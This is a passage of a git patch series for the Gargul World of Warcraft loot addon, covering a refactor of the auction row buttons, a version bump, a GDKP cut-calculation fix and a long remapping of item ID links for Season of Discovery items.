L.GDKP_OVERVIEW_DELETE_ENTRY_TOOLTIP, + disabledTooltip = L.GDKP_OVERVIEW_DELETE_ENTRY_DISABLED_TOOLTIP, + normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/delete", + update = function (self) + self:SetEnabled(not auctionWasDeleted and not Session.deletedAt and not Session.lockedAt); + end, + }); + Delete:SetPoint("TOPRIGHT", Eye, "TOPLEFT", -2, 0); + self.ActionButtons[Auction.ID].DeleteButton = Delete; + end + + --[[ RESTORE BUTTON ]] + if (auctionWasDeleted) then + Restore = Interface:createButton(ItemRow.frame, { + onClick = function() GDKPAuction:restore(Session.ID, Auction.ID); end, + tooltip = L.RESTORE, + disabledTooltip = L.GDKP_OVERVIEW_RESTORE_ENTRY_DISABLED_TOOLTIP, + normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/restore", + update = function (self) + self:SetEnabled(not Session.deletedAt and not Session.lockedAt); + end, + }); + Restore:SetPoint("TOPRIGHT", Eye, "TOPLEFT", -2, 0); + self.ActionButtons[Auction.ID].RestoreButton = Restore; + end - --[[ RESTORE BUTTON ]] - if (auctionWasDeleted) then - Restore = Interface:createButton(ItemRow.frame, { - onClick = function() GDKPAuction:restore(Session.ID, Auction.ID); end, - tooltip = L.RESTORE, - disabledTooltip = L.GDKP_OVERVIEW_RESTORE_ENTRY_DISABLED_TOOLTIP, - normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/restore", + --[[ EDIT BUTTON ]] + local Edit = Interface:createButton(ItemRow.frame, { + onClick = function() + self:closeSubWindows(); + Interface.GDKP.EditAuction:draw(Session.ID, Auction.checksum); + end, + tooltip = L.EDIT, + disabledTooltip = L.GDKP_OVERVIEW_EDIT_ENTRY_DISABLED_TOOLTIP, + normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/edit", update = function (self) - self:SetEnabled(not Session.deletedAt and not Session.lockedAt); + self:SetEnabled(not auctionWasDeleted and not Session.deletedAt and not Session.lockedAt); end, }); - Restore:SetPoint("TOPRIGHT", Eye, "TOPLEFT", -2, 0); - self.ActionButtons[Auction.ID].RestoreButton = Restore; - end - - --[[ EDIT BUTTON ]] - local Edit = Interface:createButton(ItemRow.frame, { - onClick = function() - self:closeSubWindows(); - Interface.GDKP.EditAuction:draw(Session.ID, Auction.checksum); - end, - tooltip = L.EDIT, - disabledTooltip = L.GDKP_OVERVIEW_EDIT_ENTRY_DISABLED_TOOLTIP, - normalTexture = "Interface/AddOns/Gargul/Assets/Buttons/edit", - update = function (self) - self:SetEnabled(not auctionWasDeleted and not Session.deletedAt and not Session.lockedAt); - end, - }); - Edit:SetPoint("TOPRIGHT", Delete or Restore, "TOPLEFT", -2, 0); - self.ActionButtons[Auction.ID].EditButton = Edit; + Edit:SetPoint("TOPRIGHT", Delete or Restore, "TOPLEFT", -2, 0); + self.ActionButtons[Auction.ID].EditButton = Edit; + end)(); end end); From 1a772544c8f1fc7dd9e1505342736e41e5f424db Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Tue, 6 Aug 2024 23:29:39 +0200 Subject: [PATCH 06/11] Version v7.5.10 --- Data/Constants.lua | 2 +- Gargul.toc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Data/Constants.lua b/Data/Constants.lua index da23d476..1186738b 100644 --- a/Data/Constants.lua +++ b/Data/Constants.lua @@ -554,7 +554,7 @@ local Constants = { ]] Comm = { channel = "GargulComm2", - minimumAppVersion = "7.5.3", + minimumAppVersion = "7.5.5", ---@class CommActions Actions = { diff --git a/Gargul.toc b/Gargul.toc index 34a059a1..7814d71f 100644 --- a/Gargul.toc +++ b/Gargul.toc @@ -16,7 +16,7 @@ ## Notes: Loot addon that supports GDKP, softres sr, thatsmybis tmb, auto looting, +1 tracking and much more ## IconTexture: Interface\AddOns\Gargul\Assets\Buttons\minimap ## Author: Zhorax - Firemaw -## Version: 7.5.9 +## Version: 7.5.10 ## DefaultState: enabled ## SavedVariables: GargulDB ## X-Donate: https://www.patreon.com/gargul From df49f2486afd990fa34043b8f64e945f5a27a29f Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Wed, 14 Aug 2024 21:10:10 +0200 Subject: [PATCH 07/11] Fixed: Player on GDKP cut mail list is not in cuts ledger --- Classes/GDKP/Pot.lua | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Classes/GDKP/Pot.lua b/Classes/GDKP/Pot.lua index 9022c25a..6853e008 100644 --- a/Classes/GDKP/Pot.lua +++ b/Classes/GDKP/Pot.lua @@ -322,7 +322,7 @@ function Pot:calculateCuts(sessionID) end Session.Pot.Mutators = Session.Pot.Mutators or {}; - local Cuts = Session.Pot.Cuts or {}; + local Cuts = {}; local DistributionDetails = Session.Pot.DistributionDetails or {}; -- This player hasn't had any pot or mutator calculations done for him yet From a74911c1029005ba359b696f275d6d7afc35a84d Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Thu, 15 Aug 2024 01:01:25 +0200 Subject: [PATCH 08/11] Added many item links for SoD 4 items --- Classes/Helpers.lua | 7 +- Data/ItemLinks.lua | 27676 ++++++++++++++++++----------- Data/NormalModeHardModeLinks.lua | 300 - Interface/Settings/Overview.lua | 22 + 4 files changed, 17728 insertions(+), 10277 deletions(-) diff --git a/Classes/Helpers.lua b/Classes/Helpers.lua index fafa0ce8..2bf758b3 100644 --- a/Classes/Helpers.lua +++ b/Classes/Helpers.lua @@ -2193,7 +2193,12 @@ function GL:getLinkedItemsForID(itemID, forSoftRes) end if (forSoftRes) then - for _, id in pairs(GL.Data.SoftResSpecificNormalModeHardModeLinks[itemID] or {}) do + for _, id in pairs(GL.Data.SoftResSpecificItemLinks[itemID] or {}) do + AllLinkedItemIDs[id] = i; + i = i + 1; + end + + for _, id in pairs(GL.Data.MoltenItemLinks[itemID] or {}) do AllLinkedItemIDs[id] = i; i = i + 1; end diff --git a/Data/ItemLinks.lua b/Data/ItemLinks.lua index ccef1193..3f2f0db3 100644 --- a/Data/ItemLinks.lua +++ b/Data/ItemLinks.lua @@ -4,6 +4,101 @@ local _, GL = ...; ---@class ItemLinks : Data GL.Data = GL.Data or {}; +GL.Data.SoftResSpecificItemLinks = { + -- Obsidian Edged Blade + ["18822"] = { 228229 }, + ["228229"] = { 18822 }, + -- Aurastone Hammer + ["17105"] = { 228264 }, + ["228264"] = { 17105 }, + -- Drillborer Disk + ["17066"] = { 228266 }, + ["228266"] = { 17066 }, + -- Hyperthermically Insulated Lava Dredger + ["18803"] = { 228278 }, + ["228278"] = { 18803 }, + -- Bonereaver's Edge + ["17076"] = { 228288 }, + ["228288"] = { 17076 }, + -- Head of Onyxia + ["18423"] = { 228688 }, + ["228688"] = { 18423 }, + -- Eskhandar's Collar + ["18205"] = { 228759 }, + ["228759"] = { 18205 }, +}; + +-- [[ MOLTEN ITEMS (TMB Doesn't link these currently) ]] +---@type table +GL.Data.MoltenItemLinks = { + -- Obsidian Edged Blade + ["228459"] = { 228229 }, + ["228229"] = { 228459 }, + -- Earthshaker + ["228463"] = { 228248 }, + ["228248"] = { 228463 }, + -- Striker's Mark + ["228519"] = { 228252 }, + ["228252"] = { 228519 }, + -- Aurastone Hammer + ["228462"] = { 228264 }, + ["228264"] = { 228462 }, + -- Brutality Blade + ["228506"] = { 228265 }, + ["228265"] = { 228506 }, + -- Drillborer Disk + ["228702"] = { 228266 }, + ["228266"] = { 228702 }, + -- Azuresong Mageblade + ["228517"] = { 228269 }, + ["228269"] = { 228517 }, + -- Staff of Dominance + ["228922"] = { 228271 }, + ["228271"] = { 228922 }, + -- Core Hound Tooth + ["228701"] = { 228277 }, + ["228277"] = { 228701 }, + -- Perdition's Blade + ["228511"] = { 228296 }, + ["228296"] = { 228511 }, + -- Spinal Reaper + ["228460"] = { 228299 }, + ["228299"] = { 228460 }, + -- Bonereaver's Edge + ["228461"] = { 228288 }, + ["228288"] = { 228461 }, + -- Hyperthermically Insulated Lava Dredger + ["228278"] = { 229382 }, + ["229382"] = { 228278 }, + -- Faithbringer + ["228160"] = { 229373 }, + ["229373"] = { 228160 }, + -- Shadowstrike + ["228272"] = { 229380 }, + ["229380"] = { 228272 }, + -- Gutgore Ripper + ["228267"] = { 229372 }, + ["229372"] = { 228267 }, + -- Fist of the Firesworn + ["228139"] = { 229374 }, + ["229374"] = { 228139 }, + -- Hammer of The Black Anvil + ["228128"] = { 228508 }, + ["228508"] = { 228128 }, + -- Eskhandar's Right Claw + ["228350"] = { 229379 }, + ["229379"] = { 228350 }, + -- Magmadar's Right Claw + ["228145"] = { 229378 }, + ["229378"] = { 228145 }, + -- Sorcerous Dagger + ["228263"] = { 229376 }, + ["229376"] = { 228263 }, + -- Magmadar's Left Claw + ["228146"] = { 229377 }, + ["229377"] = { 228146 }, +}; + GL.Data.ItemLinks = { -- Head of Onyxia (Horde) ["49643"] = { @@ -13,5912 +108,9447 @@ GL.Data.ItemLinks = { ["49644"] = { 49643, -- Head of Onyxia (Horde) }, - -- Dragonslayer's Signet - ["18403"] = { - 18422, -- Head of Onyxia (Horde) + -- Sturdy Lunchbox + ["1652"] = { + 221498, -- Sturdy Lunchbox }, - -- Onyxia Tooth Pendant - ["18404"] = { - 18422, -- Head of Onyxia (Horde) + -- Greater Healing Potion + ["1710"] = { + 223914, -- Greater Healing Potion }, - -- Onyxia Blood Talisman - ["18406"] = { - 18422, -- Head of Onyxia (Horde) + -- Blade of Hanna + ["2801"] = { + 227691, -- Blade of Hanna }, - -- Head of Onyxia (Horde) - ["18422"] = { - 18403, -- Dragonslayer's Signet - 18404, -- Onyxia Tooth Pendant - 18406, -- Onyxia Blood Talisman - 18423, -- Head of Onyxia (Alliance) + -- Golden Scale Coif + ["3837"] = { + 217279, -- Golden Scale Coif }, - -- Head of Onyxia (Alliance) - ["18423"] = { - 18403, -- Dragonslayer's Signet - 18404, -- Onyxia Tooth Pendant - 18406, -- Onyxia Blood Talisman - 18422, -- Head of Onyxia (Horde) + -- Golden Scale Shoulders + ["3841"] = { + 217283, -- Golden Scale Shoulders }, - -- Head of Nefarian (Horde) - ["19002"] = { - 19003, -- Head of Nefarian (Alliance) - 19366, -- Master Dragonslayer's Orb - 19383, -- Master Dragonslayer's Medallion - 19384, -- Master Dragonslayer's Ring + -- Golden Scale Leggings + ["3843"] = { + 217285, -- Golden Scale Leggings }, - -- Head of Nefarian (Alliance) - ["19003"] = { - 19002, -- Head of Nefarian (Horde) - 19366, -- Master Dragonslayer's Orb - 19383, -- Master Dragonslayer's Medallion - 19384, -- Master Dragonslayer's Ring + -- Golden Scale Cuirass + ["3845"] = { + 217277, -- Golden Scale Cuirass }, - -- Master Dragonslayer's Orb - ["19366"] = { - 19002, -- Head of Nefarian (Horde) + -- Golden Scale Boots + ["3847"] = { + 217275, -- Golden Scale Boots }, - -- Master Dragonslayer's Medallion - ["19383"] = { - 19002, -- Head of Nefarian (Horde) + -- Moonsteel Broadsword + ["3853"] = { + 217281, -- Moonsteel Broadsword }, - -- Master Dragonslayer's Ring - ["19384"] = { - 19002, -- Head of Nefarian (Horde) + -- Plans: Golden Scale Shoulders + ["3871"] = { + 217284, -- Plans: Golden Scale Shoulders }, - -- Primal Hakkari Bindings - ["19716"] = { - 19827, -- Zandalar Freethinker's Armguards - 19833, -- Zandalar Predator's Bracers - 19846, -- Zandalar Illusionist's Wraps + -- Plans: Golden Scale Leggings + ["3872"] = { + 217286, -- Plans: Golden Scale Leggings }, - -- Primal Hakkari Armsplint - ["19717"] = { - 19824, -- Zandalar Vindicator's Armguards - 19830, -- Zandalar Augur's Bracers - 19836, -- Zandalar Madcap's Bracers + -- Plans: Golden Scale Cuirass + ["3873"] = { + 217278, -- Plans: Golden Scale Cuirass }, - -- Primal Hakkari Stanchion - ["19718"] = { - 19840, -- Zandalar Haruspex's Bracers - 19843, -- Zandalar Confessor's Wraps - 19848, -- Zandalar Demoniac's Wraps + -- Plans: Golden Scale Boots + ["3875"] = { + 217276, -- Plans: Golden Scale Boots }, - -- Primal Hakkari Girdle - ["19719"] = { - 19823, -- Zandalar Vindicator's Belt - 19829, -- Zandalar Augur's Belt - 19835, -- Zandalar Madcap's Mantle + -- Guardian Belt + ["4258"] = { + 217265, -- Guardian Belt }, - -- Primal Hakkari Sash - ["19720"] = { - 19839, -- Zandalar Haruspex's Belt - 19842, -- Zandalar Confessor's Bindings - 19849, -- Zandalar Demoniac's Mantle + -- Guardian Leather Bracers + ["4260"] = { + 217263, -- Guardian Leather Bracers }, - -- Primal Hakkari Shawl - ["19721"] = { - 19826, -- Zandalar Freethinker's Belt - 19832, -- Zandalar Predator's Belt - 19845, -- Zandalar Illusionist's Mantle + -- Pattern: Guardian Belt + ["4298"] = { + 217266, -- Pattern: Guardian Belt }, - -- Primal Hakkari Tabard - ["19722"] = { - 19825, -- Zandalar Freethinker's Breastplate - 19828, -- Zandalar Augur's Hauberk - 19838, -- Zandalar Haruspex's Tunic + -- Pattern: Guardian Leather Bracers + ["4300"] = { + 217264, -- Pattern: Guardian Leather Bracers }, - -- Primal Hakkari Kossack - ["19723"] = { - 19822, -- Zandalar Vindicator's Breastplate - 20033, -- Zandalar Demoniac's Robe - 20034, -- Zandalar Illusionist's Robe + -- Enchanter's Cowl + ["4322"] = { + 217257, -- Enchanter's Cowl }, - -- Primal Hakkari Aegis - ["19724"] = { - 19831, -- Zandalar Predator's Mantle - 19834, -- Zandalar Madcap's Tunic - 19841, -- Zandalar Confessor's Mantle + -- Boots of the Enchanter + ["4325"] = { + 217253, -- Boots of the Enchanter }, - -- Heart of Hakkar - ["19802"] = { - 19948, -- Zandalarian Hero Badge - 19949, -- Zandalarian Hero Medallion - 19950, -- Zandalarian Hero Charm + -- Long Silken Cloak + ["4326"] = { + 217252, -- Long Silken Cloak }, - -- Zandalar Vindicator's Breastplate - ["19822"] = { - 19723, -- Primal Hakkari Kossack + -- Pattern: Boots of the Enchanter + ["4352"] = { + 217254, -- Pattern: Boots of the Enchanter }, - -- Zandalar Vindicator's Belt - ["19823"] = { - 19719, -- Primal Hakkari Girdle + -- Moonsight Rifle + ["4383"] = { + 217314, -- Moonsight Rifle }, - -- Zandalar Vindicator's Armguards - ["19824"] = { - 19717, -- Primal Hakkari Armsplint + -- Guardian Pants + ["5962"] = { + 217267, -- Guardian Pants }, - -- Zandalar Freethinker's Breastplate - ["19825"] = { - 19722, -- Primal Hakkari Tabard + -- Plans: Golden Scale Coif + ["6047"] = { + 217280, -- Plans: Golden Scale Coif }, - -- Zandalar Freethinker's Belt - ["19826"] = { - 19721, -- Primal Hakkari Shawl + -- Earthen Vest + ["7051"] = { + 217256, -- Earthen Vest }, - -- Zandalar Freethinker's Armguards - ["19827"] = { - 19716, -- Primal Hakkari Bindings + -- Crimson Silk Belt + ["7055"] = { + 217255, -- Crimson Silk Belt }, - -- Zandalar Augur's Hauberk - ["19828"] = { - 19722, -- Primal Hakkari Tabard + -- Crimson Silk Shoulders + ["7059"] = { + 217250, -- Crimson Silk Shoulders }, - -- Zandalar Augur's Belt - ["19829"] = { - 19719, -- Primal Hakkari Girdle + -- Earthen Silk Belt + ["7061"] = { + 217248, -- Earthen Silk Belt }, - -- Zandalar Augur's Bracers - ["19830"] = { - 19717, -- Primal Hakkari Armsplint + -- Crimson Silk Robe + ["7063"] = { + 217245, -- Crimson Silk Robe }, - -- Zandalar Predator's Mantle - ["19831"] = { - 19724, -- Primal Hakkari Aegis + -- Pattern: Crimson Silk Shoulders + ["7084"] = { + 217251, -- Pattern: Crimson Silk Shoulders }, - -- Zandalar Predator's Belt - ["19832"] = { - 19721, -- Primal Hakkari Shawl + -- Pattern: Earthen Silk Belt + ["7086"] = { + 217249, -- Pattern: Earthen Silk Belt }, - -- Zandalar Predator's Bracers - ["19833"] = { - 19716, -- Primal Hakkari Bindings + -- Pattern: Crimson Silk Robe + ["7088"] = { + 217244, -- Pattern: Crimson Silk Robe }, - -- Zandalar Madcap's Tunic - ["19834"] = { - 19724, -- Primal Hakkari Aegis + -- Schematic: Goblin Rocket Boots + ["7192"] = { + 221339, -- Schematic: Goblin Rocket Boots }, - -- Zandalar Madcap's Mantle - ["19835"] = { - 19719, -- Primal Hakkari Girdle + -- Embalmed Shroud + ["7691"] = { + 217294, -- Embalmed Shroud }, - -- Zandalar Madcap's Bracers - ["19836"] = { - 19717, -- Primal Hakkari Armsplint + -- Necrotic Wand + ["7708"] = { + 217295, -- Necrotic Wand }, - -- Zandalar Haruspex's Tunic - ["19838"] = { - 19722, -- Primal Hakkari Tabard + -- Robe of Doan + ["7711"] = { + 217297, -- Robe of Doan }, - -- Zandalar Haruspex's Belt - ["19839"] = { - 19720, -- Primal Hakkari Sash + -- Mantle of Doan + ["7712"] = { + 217298, -- Mantle of Doan }, - -- Zandalar Haruspex's Bracers - ["19840"] = { - 19718, -- Primal Hakkari Stanchion + -- Illusionary Rod + ["7713"] = { + 217299, -- Illusionary Rod }, - -- Zandalar Confessor's Mantle - ["19841"] = { - 19724, -- Primal Hakkari Aegis + -- Whitemane's Chapeau + ["7720"] = { + 217300, -- Whitemane's Chapeau }, - -- Zandalar Confessor's Bindings - ["19842"] = { - 19720, -- Primal Hakkari Sash + -- Triune Amulet + ["7722"] = { + 217301, -- Triune Amulet }, - -- Zandalar Confessor's Wraps - ["19843"] = { - 19718, -- Primal Hakkari Stanchion + -- Mograine's Might + ["7723"] = { + 217302, -- Mograine's Might }, - -- Zandalar Illusionist's Mantle - ["19845"] = { - 19721, -- Primal Hakkari Shawl + -- Ghostshard Talisman + ["7731"] = { + 217296, -- Ghostshard Talisman }, - -- Zandalar Illusionist's Wraps - ["19846"] = { - 19716, -- Primal Hakkari Bindings + -- Precision Bow + ["8183"] = { + 217315, -- Precision Bow }, - -- Zandalar Demoniac's Wraps - ["19848"] = { - 19718, -- Primal Hakkari Stanchion + -- Turtle Scale Gloves + ["8187"] = { + 217270, -- Turtle Scale Gloves }, - -- Zandalar Demoniac's Mantle - ["19849"] = { - 19720, -- Primal Hakkari Sash + -- Turtle Scale Breastplate + ["8189"] = { + 217268, -- Turtle Scale Breastplate }, - -- Zandalarian Hero Badge - ["19948"] = { - 19802, -- Heart of Hakkar + -- Big Voodoo Robe + ["8200"] = { + 217261, -- Big Voodoo Robe }, - -- Zandalarian Hero Medallion - ["19949"] = { - 19802, -- Heart of Hakkar + -- Big Voodoo Mask + ["8201"] = { + 217259, -- Big Voodoo Mask }, - -- Zandalarian Hero Charm - ["19950"] = { - 19802, -- Heart of Hakkar + -- Pattern: Turtle Scale Gloves + ["8385"] = { + 217271, -- Pattern: Turtle Scale Gloves }, - -- Zandalar Demoniac's Robe - ["20033"] = { - 19723, -- Primal Hakkari Kossack + -- Pattern: Big Voodoo Robe + ["8386"] = { + 217262, -- Pattern: Big Voodoo Robe }, - -- Zandalar Illusionist's Robe - ["20034"] = { - 19723, -- Primal Hakkari Kossack + -- Pattern: Big Voodoo Mask + ["8387"] = { + 217260, -- Pattern: Big Voodoo Mask }, - -- Qiraji Magisterial Ring - ["20884"] = { - 21393, -- Signet of Unyielding Strength - 21396, -- Ring of Eternal Justice - 21399, -- Ring of the Gathering Storm - 21408, -- Band of Unending Life - 21414, -- Band of Vaulted Secrets + -- Reins of the Bengal Tiger + ["8630"] = { + 216549, -- Reins of the Bengal Tiger }, - -- Qiraji Martial Drape - ["20885"] = { - 21394, -- Drape of Unyielding Strength - 21406, -- Cloak of Veiled Shadows - 21412, -- Shroud of Infinite Wisdom - 21415, -- Drape of Vaulted Secrets + -- Invisibility Potion + ["9172"] = { + 217693, -- Invisibility Potion }, - -- Qiraji Spiked Hilt - ["20886"] = { - 21392, -- Sickle of Unyielding Strength - 21395, -- Blade of Eternal Justice - 21398, -- Hammer of the Gathering Storm - 21401, -- Scythe of the Unseen Path - 21404, -- Dagger of Veiled Shadows + -- Grime-Encrusted Ring + ["9326"] = { + 216661, -- Grime-Encrusted Ring }, - -- Qiraji Ceremonial Ring - ["20888"] = { - 21402, -- Signet of the Unseen Path - 21405, -- Band of Veiled Shadows - 21411, -- Ring of Infinite Wisdom - 21417, -- Ring of Unspoken Names + -- Brilliant Gold Ring + ["9362"] = { + 216662, -- Brilliant Gold Ring }, - -- Qiraji Regal Drape - ["20889"] = { - 21397, -- Cape of Eternal Justice - 21400, -- Cloak of the Gathering Storm - 21403, -- Cloak of the Unseen Path - 21409, -- Cloak of Unending Life - 21418, -- Shroud of Unspoken Names + -- Golden Scale Gauntlets + ["9366"] = { + 217273, -- Golden Scale Gauntlets }, - -- Qiraji Ornate Hilt - ["20890"] = { - 21407, -- Mace of Unending Life - 21410, -- Gavel of Infinite Wisdom - 21413, -- Blade of Vaulted Secrets - 21416, -- Kris of Unspoken Names + -- Plans: Golden Scale Gauntlets + ["9367"] = { + 217274, -- Plans: Golden Scale Gauntlets }, - -- Vek'nilash's Circlet - ["20926"] = { - 21329, -- Conqueror's Crown - 21337, -- Doomcaller's Circlet - 21347, -- Enigma Circlet - 21348, -- Tiara of the Oracle + -- Sul'thraze the Lasher + ["9372"] = { + 223526, -- Sul'thraze the Lasher }, - -- Ouro's Intact Hide - ["20927"] = { - 21332, -- Conqueror's Legguards - 21346, -- Enigma Leggings - 21352, -- Trousers of the Oracle - 21362, -- Deathdealer's Leggings + -- Revelosh's Boots + ["9387"] = { + 217306, -- Revelosh's Boots }, - -- Qiraji Bindings of Command - ["20928"] = { - 21330, -- Conqueror's Spaulders - 21333, -- Conqueror's Greaves - 21349, -- Footwraps of the Oracle - 21350, -- Mantle of the Oracle - 21359, -- Deathdealer's Boots - 21361, -- Deathdealer's Spaulders - 21365, -- Striker's Footguards - 21367, -- Striker's Pauldrons + -- Revelosh's Armguards + ["9388"] = { + 217305, -- Revelosh's Armguards }, - -- Carapace of the Old God - ["20929"] = { - 21331, -- Conqueror's Breastplate - 21364, -- Deathdealer's Vest - 21370, -- Striker's Hauberk - 21374, -- Stormcaller's Hauberk - 21389, -- Avenger's Breastplate + -- Revelosh's Spaulders + ["9389"] = { + 217307, -- Revelosh's Spaulders }, - -- Vek'lor's Diadem - ["20930"] = { - 21353, -- Genesis Helm - 21360, -- Deathdealer's Helm - 21366, -- Striker's Diadem - 21372, -- Stormcaller's Diadem - 21387, -- Avenger's Crown + -- Revelosh's Gloves + ["9390"] = { + 217304, -- Revelosh's Gloves }, - -- Skin of the Great Sandworm - ["20931"] = { - 21336, -- Doomcaller's Trousers - 21356, -- Genesis Trousers - 21368, -- Striker's Leggings - 21375, -- Stormcaller's Leggings - 21390, -- Avenger's Legguards + -- Stoneweaver Leggings + ["9407"] = { + 217303, -- Stoneweaver Leggings }, - -- Qiraji Bindings of Dominance - ["20932"] = { - 21335, -- Doomcaller's Mantle - 21338, -- Doomcaller's Footwraps - 21344, -- Enigma Boots - 21345, -- Enigma Shoulderpads - 21354, -- Genesis Shoulderpads - 21355, -- Genesis Boots - 21373, -- Stormcaller's Footguards - 21376, -- Stormcaller's Pauldrons - 21388, -- Avenger's Greaves - 21391, -- Avenger's Pauldrons + -- Ironshod Bludgeon + ["9408"] = { + 217704, -- Ironshod Bludgeon }, - -- Husk of the Old God - ["20933"] = { - 21334, -- Doomcaller's Robes - 21343, -- Enigma Robes - 21351, -- Vestments of the Oracle - 21357, -- Genesis Vest + -- Grimlok's Tribal Vestments + ["9415"] = { + 223535, -- Grimlok's Tribal Vestments }, - -- Head of Ossirian the Unscarred - ["21220"] = { - 21504, -- Charm of the Shifting Sands - 21505, -- Choker of the Shifting Sands - 21506, -- Pendant of the Shifting Sands - 21507, -- Amulet of the Shifting Sands + -- Grimlok's Charge + ["9416"] = { + 223536, -- Grimlok's Charge }, - -- Eye of C'Thun - ["21221"] = { - 21709, -- Ring of the Fallen God - 21710, -- Cloak of the Fallen God - 21712, -- Amulet of the Fallen God + -- Skullplate Bracers + ["9432"] = { + 223537, -- Skullplate Bracers }, - -- Conqueror's Crown - ["21329"] = { - 20926, -- Vek'nilash's Circlet + -- Gahz'rilla Fang + ["9467"] = { + 223527, -- Gahz'rilla Fang }, - -- Conqueror's Spaulders - ["21330"] = { - 20928, -- Qiraji Bindings of Command + -- Gahz'rilla Scale Armor + ["9469"] = { + 223528, -- Gahz'rilla Scale Armor }, - -- Conqueror's Breastplate - ["21331"] = { - 20929, -- Carapace of the Old God + -- Jinxed Hoodoo Skin + ["9473"] = { + 223529, -- Jinxed Hoodoo Skin }, - -- Conqueror's Legguards - ["21332"] = { - 20927, -- Ouro's Intact Hide + -- Jinxed Hoodoo Kilt + ["9474"] = { + 223530, -- Jinxed Hoodoo Kilt }, - -- Conqueror's Greaves - ["21333"] = { - 20928, -- Qiraji Bindings of Command + -- Big Bad Pauldrons + ["9476"] = { + 223531, -- Big Bad Pauldrons }, - -- Doomcaller's Robes - ["21334"] = { - 20933, -- Husk of the Old God + -- Embrace of the Lycan + ["9479"] = { + 223963, -- Embrace of the Lycan }, - -- Doomcaller's Mantle - ["21335"] = { - 20932, -- Qiraji Bindings of Dominance + -- Mechbuilder's Overalls + ["9508"] = { + 213298, -- Mechbuilder's Overalls }, - -- Doomcaller's Trousers - ["21336"] = { - 20931, -- Skin of the Great Sandworm + -- Mechanic's Pipehammer + ["9604"] = { + 217006, -- Mechanic's Pipehammer }, - -- Doomcaller's Circlet - ["21337"] = { - 20926, -- Vek'nilash's Circlet + -- Repairman's Cape + ["9605"] = { + 217005, -- Repairman's Cape }, - -- Doomcaller's Footwraps - ["21338"] = { - 20932, -- Qiraji Bindings of Dominance + -- Lifeblood Amulet + ["9641"] = { + 223532, -- Lifeblood Amulet }, - -- Enigma Robes - ["21343"] = { - 20933, -- Husk of the Old God + -- Black Mageweave Vest + ["9998"] = { + 217246, -- Black Mageweave Vest }, - -- Enigma Boots - ["21344"] = { - 20932, -- Qiraji Bindings of Dominance + -- Black Mageweave Leggings + ["9999"] = { + 217247, -- Black Mageweave Leggings }, - -- Enigma Shoulderpads - ["21345"] = { - 20932, -- Qiraji Bindings of Dominance + -- Essence of Eranikus + ["10454"] = { + 221475, -- Essence of Eranikus }, - -- Enigma Leggings - ["21346"] = { - 20927, -- Ouro's Intact Hide + -- Chained Essence of Eranikus + ["10455"] = { + 221474, -- Chained Essence of Eranikus }, - -- Enigma Circlet - ["21347"] = { - 20926, -- Vek'nilash's Circlet + -- Avenguard Helm + ["10749"] = { + 221781, -- Avenguard Helm }, - -- Tiara of the Oracle - ["21348"] = { - 20926, -- Vek'nilash's Circlet + -- Lifeforce Dirk + ["10750"] = { + 223329, -- Lifeforce Dirk }, - -- Footwraps of the Oracle - ["21349"] = { - 20928, -- Qiraji Bindings of Command + -- Gemburst Circlet + ["10751"] = { + 223328, -- Gemburst Circlet }, - -- Mantle of the Oracle - ["21350"] = { - 20928, -- Qiraji Bindings of Command + -- Robes of the Lich + ["10762"] = { + 217288, -- Robes of the Lich }, - -- Vestments of the Oracle - ["21351"] = { - 20933, -- Husk of the Old God + -- Deathchill Armor + ["10764"] = { + 217289, -- Deathchill Armor }, - -- Trousers of the Oracle - ["21352"] = { - 20927, -- Ouro's Intact Hide + -- Glowing Eye of Mordresh + ["10769"] = { + 217290, -- Glowing Eye of Mordresh }, - -- Genesis Helm - ["21353"] = { - 20930, -- Vek'lor's Diadem + -- Mordresh's Lifeless Skull + ["10770"] = { + 217291, -- Mordresh's Lifeless Skull }, - -- Genesis Shoulderpads - ["21354"] = { - 20932, -- Qiraji Bindings of Dominance + -- Deathmage Sash + ["10771"] = { + 217292, -- Deathmage Sash }, - -- Genesis Boots - ["21355"] = { - 20932, -- Qiraji Bindings of Dominance + -- Silky Spider Cape + ["10776"] = { + 217293, -- Silky Spider Cape }, - -- Genesis Trousers - ["21356"] = { - 20931, -- Skin of the Great Sandworm + -- Mark of Hakkar + ["10780"] = { + 223327, -- Mark of Hakkar }, - -- Genesis Vest - ["21357"] = { - 20933, -- Husk of the Old God + -- Hakkari Breastplate + ["10781"] = { + 223325, -- Hakkari Breastplate }, - -- Deathdealer's Boots - ["21359"] = { - 20928, -- Qiraji Bindings of Command + -- Hakkari Shroud + ["10782"] = { + 223326, -- Hakkari Shroud }, - -- Deathdealer's Helm - ["21360"] = { - 20930, -- Vek'lor's Diadem + -- Rainstrider Leggings + ["11123"] = { + 223324, -- Rainstrider Leggings }, - -- Deathdealer's Spaulders - ["21361"] = { - 20928, -- Qiraji Bindings of Command + -- Helm of Exile + ["11124"] = { + 221782, -- Helm of Exile }, - -- Deathdealer's Leggings - ["21362"] = { - 20927, -- Ouro's Intact Hide + -- Greater Mystic Wand + ["11290"] = { + 217287, -- Greater Mystic Wand }, - -- Deathdealer's Vest - ["21364"] = { - 20929, -- Carapace of the Old God + -- Enthralled Sphere + ["11625"] = { + 223539, -- Enthralled Sphere }, - -- Striker's Footguards - ["21365"] = { - 20928, -- Qiraji Bindings of Command + -- Houndmaster's Bow + ["11628"] = { + 223540, -- Houndmaster's Bow }, - -- Striker's Diadem - ["21366"] = { - 20930, -- Vek'lor's Diadem + -- Houndmaster's Rifle + ["11629"] = { + 223982, -- Houndmaster's Rifle }, - -- Striker's Pauldrons - ["21367"] = { - 20928, -- Qiraji Bindings of Command + -- Silkweb Gloves + ["11634"] = { + 223984, -- Silkweb Gloves }, - -- Striker's Leggings - ["21368"] = { - 20931, -- Skin of the Great Sandworm + -- Naglering + ["11669"] = { + 227966, -- Naglering }, - -- Striker's Hauberk - ["21370"] = { - 20929, -- Carapace of the Old God + -- Graverot Cape + ["11677"] = { + 223986, -- Graverot Cape }, - -- Stormcaller's Diadem - ["21372"] = { - 20930, -- Vek'lor's Diadem + -- Ironfoe + ["11684"] = { + 227991, -- Ironfoe 